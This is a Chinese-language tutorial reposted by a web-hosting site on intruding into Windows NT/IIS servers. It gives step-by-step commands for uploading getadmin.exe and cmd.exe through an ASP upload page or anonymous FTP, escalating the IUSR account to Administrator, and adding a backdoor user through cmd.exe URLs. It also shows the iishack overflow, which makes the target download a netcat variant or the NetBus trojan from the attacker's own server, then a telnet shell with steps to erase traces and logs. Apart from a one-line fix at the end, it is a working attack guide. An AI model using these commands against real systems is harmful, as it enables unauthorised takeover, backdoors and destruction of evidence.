入侵NTserver典型途径攻击基础

1. 假如您有NT/IIS服务器的任何一个帐号，哪怕是guest帐号，都能够获得Administrator权限；
　　2. 用netcat和iishack能够获得Administrator；
　　3. iusr_电脑名这个帐号有ftp上传、web执行等权限；
　　4. 在web server上执行程式是入侵NT的关键；
　　5. 要在web server上执行程式就先要上传文档到cgi-bin目录或scripts目录等有执行权限的目录上去。
　　在本文中，目标机器的名称是ntsvr2，目标机器的域名是www.xxx.com，目标机器上有scripts和cgi-bin目录，scripts目录下有uploadn.asp等asp程式，可能有guest帐号，肯定有iusr_ntsvr2这个帐号。

　　第一个方法：用iusr_ntsvr2或guest这两个帐号(这里假设我们已破解了这个帐号的密码)，在浏览器输入：
　http://www.xxx.com/scripts/uploadn.asp
　　guest和iusr_ntsvr2这两个帐号都能够进这个asp页面。
　　在这里把文档getadmin和gasys.dll连同cmd.exe上传到/scripts目录，然后输入：
　http://www.xxx.com/scripts/getadmin.exe?IUSR_ntsvr2
　　大约十多秒后屏幕显示：
　　CGI Error
　　这时有90%的可能是您已把IUSR_ntsvr2升级为Administrator，也就是任何访问该web站的人都是管理员。
　　下面能够add user:
　http://www.xxx.com/cgi-bin/cmd.exe?/c c:/winnt/system32/net.exe user china news /add

　　这样就创建了一个叫china用户，密码是news，然后：
　http://www.xxx.com/scripts/getadmin.exe?china
　　第二个方法：用匿名ftp
　　假如允许匿名帐号ftp登陆的设定，也给我们带来了突破NT server的机会。我们用ftp登陆一个NT
server，比如:www.xxx.com(示例名)：
　　c:/> ftp www.xxx.com
　　Connected to www.xxx.com
　　220 ntsvr2 Microsoft FTP Service (Version 3.0).
　　ntsvr2这个东西暴露了其NETbios名，那么在IIS的背景下，必然会有一个IUSR_ntsvr2的用户帐号，属于Domain
user组，这个帐号我们以后要用来获取Administrator的权限。
　　User (www.xxx.com:(none)):anonymous
　　331 Anonymous access allowed, send identity (e-mail name) as password.
　　Password: 输入guest@ 或guest
　　对于缺乏网络安全知识的管理员来说，很多人没有将guest帐号禁止，或没有配置密码，那么guest帐号就是个可用的正确的用户帐号，虽然只属于Domain
guest组，在这种情况下我们就能够进NT server的ftp了。
　　进去以后，看看目录列表，试试cd /scripts或cgi-bin等关键目录，假如运气好，改变目录成功，这时您就有了80%的把握了。
　　把winnt下的cmd.exe copy到cgi-bin，把getadmin和gasys.dll传上去到cgi-bin，然后输入：
　http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_ntsvr2
　　大约十多秒后屏幕显示:
　　CGI Error
　　这时有90%的可能是您已把IUSR_ntsvr2升级为Administrator，也就是任何访问该web站的人都是管理员。
　　下面能够add user：
　http://www.xxx.com/cgi-bin/cmd.exe?/c c:/winnt/system32/net.exe user china news /add

　　这样就创建了一个叫china用户，密码是news，然后：
　http://www.xxx.com/cgi-bin/getadmin.exe?china
　　或
　http://www.xxx.com/scripts/tools/getadmin.exe?china
　　您再用china的帐号登陆，就能够有最大的权限了，也能够用上面的cmd.exe的方法直接修改。假如没有cmd.exe，也能够自己传一个上去到scripts/tools或cgi-bin目录下。

　　第三个方法：用netcat和iishack
　　假如您熟悉使用Netcat这个工具，您就知道netcat能够利用NT的弱点在其上绑定端口,下面用的eEye工具已介绍过，假如您熟悉Netcat，成功的可能性会更大。

　
　　IIS的ISAPI的毛病(*.HTR)：我们再来看看eEye最近这两天发现的一个关于NT/IIS的问题和工具。在IIS的/Inetsrv目录下，有个DLL文档叫ism.dll，这个模块在web运行的时候就被加载到较高的内存地址，并且导致了零字节问题到处出现。IIShack.asm，利用这个毛病，eEye写了两个程式：
iishack.exe、ncx99.exe，为达目的您必须自己有一个web server，把ncx99.exe和netbus木马传到这个web
server的目录下，比如您的web server是www.mysvr.com，而对方的IIS server是www.xxx.com，则：
　　iishack www.xxx.com 80 www.mysvr.com/ncx99.exe (注意：不要加“http://”字符！)
　　上述命令输入后这时您应该能够看到：
　　------(IIS 4.0 remote buffer overflow exploit)-----------------
　　(c) dark spyrit -- barns@eeye.com.
　http://www.eEye.com
　　[usage: iishack 〈host〉 〈port〉 〈url〉]
　　eg - iishack www.xxx.com 80 www.mysvr.com/thetrojan.exe
　　do not include http://' before hosts!
　　---------------------------------------------------------------
　　Data sent!
　　然后：再把Netbus等特洛伊木马传到对方机器上去：
　　iishack www.example.com 80 www.myserver.com/netbus.exe
　　ncx99.exe实际上是有名的Netcat的变种，他把对方server的cmd.exe绑定到Telnet服务，ncx.exe这是较早的版本，是把端口绑到80的，由于80端口跑web服务，端口已被使用，所以可能不一定有效。然后，用Telnet到对方的99或80端口：
　　Telnet www.xxx.com 99

　　结果是这样:
　　Microsoft(R) Windows NT(TM)
　　(C) Copyright 1985-1996 Microsoft Corp.
　　C:/>[You have full access to the system, happy browsing :)]
　　C:/>[Add a scheduled task to restart inetinfo in X minutes]
　　C:/>[Add a scheduled task to delete ncx.exe in X-1 minutes]
　　C:/>[Clean up any trace or logs we might have left behind.]
　　这样，您就完全控制了其硬盘上的文档！注意，假如您type exit退出，对方server上的这个进程也会退出。
　　参考资料: eeye.zip
　　补救方法:在IIS的www service属性中将主目录的应用程式配置的*.htr的映射删除。

文章整理：西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!